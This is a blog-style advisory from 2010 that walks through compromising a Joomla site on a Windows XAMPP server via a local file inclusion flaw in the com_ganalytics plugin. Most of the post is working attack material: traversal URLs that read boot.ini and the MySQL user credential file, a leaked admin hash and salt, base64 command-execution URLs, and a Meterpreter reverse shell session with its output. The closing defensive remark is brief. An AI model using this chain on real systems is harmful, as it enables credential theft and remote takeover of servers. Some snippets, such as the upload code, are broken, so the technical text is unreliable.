My Vulnerability advisories : New metode and style hack windows server using LFI and new type of backdoor (.exe)

2010/10/21

New metode and style hack windows server using LFI and new type of backdoor (.exe)

Local File Inclusion attacks are among the most common vulnerabilities seen against web applications. Because they’re thought to be relatively benign, most organizations dismiss the large security risk they potentially create. In this paper I’ll present an attack against a site where the only known vulnerability is a web application that’s vulnerable to Local File Inclusion.

The host is a Windows system running XAMP to supply Apache, MySQL and PHP. The site is running the Joomla! web application and has a single vulnerable plugin installed: com_ganalytics. This is the Google Analytics plugin used by Joomla site operators to track site usage.

The vulnerable piece of code that makes LFI possible is found in the ganalytics.php file. It’s the following:

if($controller = JRequest::getVar(‘controller’)) {
require_once (JPATH_COMPONENT.DS.’controllers’.DS.$controller.’.php’);
}

The ‘controller‘ parameter accepts the path passed to it without any verification. This small mistake will allow an attacker to traverse the entire file system.

I was able to use this code in the following manner to read files on the local machine.

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\boot.ini%00

This returned the following in my browser…

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /noexecute=optin /fastdetect

Nice…

After a bit of research about the Joomla database layout, I learned that the jos_users table is the one that contains the user information. Everything from the password hashes and salts to user email addresses are kept in that table.

Using the same directory traversal used earlier, we’ll attempt to read the MySQL data file containing user credentials using the following:

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00

with the following result…

þ>�� Administrator admin administrator@localhost-db.comA115def1b208327f20d85b65aa7dc2440:UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I Super Administrator 9²þG ��ìnH H ��m�admin_language=language= editor= helpsite= timezone=0 ��

The red highlighted portion of the above output is the important part. This is the Joomla site administator’s password hash and salt separated by a colon.

hash=115def1b208327f20d85b65aa7dc2440
salt=UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I

After a bit of research at the following site ‘http://forum.joomla.org/viewtopic.php?f=432&t=207689‘ we learn about how the joomla password is calculated.

It is an md5 digest of the ‘cleartext password+salt‘

With this knowledge the easiest way into the administrative interface is probably to brute force the administrator password.

We navigate to the administator account settings page and start looking for a location to inject the following PHP code that would allow us to execute commands on the local system.

We use the Tamper Data Firefox plugin to inject the PHP base64 decode shell into the ‘language’ field.

At this point we now have the ability to run commands on the system. The process of doing so involves the following

* base64 encoding our command
* injecting the base64 encoded text into the ‘cmd’ parameter
* running the command by calling the base64 decoder shell that we injected into the database.

So let’s give it a shot. We’ll base64 encode the “dir” command

http://localhost/joomla/index.php?option=com_ganalytics&cmd=ZGlyCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD

with the following result:

(sorry hidden for Privacy)

Nice. The next step is to get something a bit more ‘potent’ on the system so that we get shell access.

We’re going to make use of PHP’s $_FILES variable to create a file uploader that we can use to put our payload on the local file system.

root@bt:~/ctp/traversal/joomla# cat upload.php

$upload="echo \"\" > d.php";
$output=base64_encode($upload);
echo $output;
?>

ok now we try to pop up the shell

root@bt:~/ctp/traversal/joomla# echo shell.exe | base64
c2hlbGwuZXhlCg==
root@bt:~/ctp/traversal/joomla#

http://localhost/joomla/index.php?option=com_ganalytics&cmd=c2hlbGwuZXhlCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00

Meanwhile on the attacking machine…

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.77.236:443
[*] Starting the payload handler…
[*] Sending stage (748032 bytes) to 172.16.77.246
[*] Meterpreter session 2 opened (172.16.77.236:443 -> 172.16.77.246:1682)

meterpreter > getuid
Server username: JOOMLA\Administrator
meterpreter > shell
Process 2640 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xamp\htdocs\joomla>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : example.com
IP Address. . . . . . . . . . . . : 172.16.77.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.77.8

C:\xamp\htdocs>

Game Over..!!!

At this point attacker can use this machine as pivot to attack other machines within the network, install trojans, place rogue code on the webserver, etc.. The only limit is how creative they are. So the next time you run that vulnerability scanner against your web application farm, don’t be so quick to dismiss the potential damage of the RFI/LFI results.